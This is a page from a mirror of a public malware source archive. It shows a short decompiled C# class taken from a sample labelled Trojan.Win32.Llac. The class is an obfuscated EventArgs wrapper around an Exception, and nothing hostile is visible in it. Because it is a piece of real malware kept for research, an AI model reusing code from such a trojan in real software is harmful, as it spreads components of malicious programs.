mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
f2ac1ece55
add
23 lines
678 B
C#
23 lines
678 B
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: syncuiLoader, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: F112AE9C-7564-463C-8834-3BB2BC4FBE1B
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.aamy-d1153c91831872cfeacf510426d9b4752eab5933102816559dcd2628b12a7253.exe
|
||
|
||
using System;
|
||
using System.Runtime.CompilerServices;
|
||
using System.Runtime.InteropServices;
|
||
|
||
namespace \u0004
|
||
{
|
||
internal sealed class \u0003 : EventArgs
|
||
{
|
||
private Exception \u0001;
|
||
|
||
[SpecialName]
|
||
public Exception \u0003() => this.\u0001;
|
||
|
||
internal \u0003([In] Exception obj0) => this.\u0001 = obj0;
|
||
}
|
||
}
|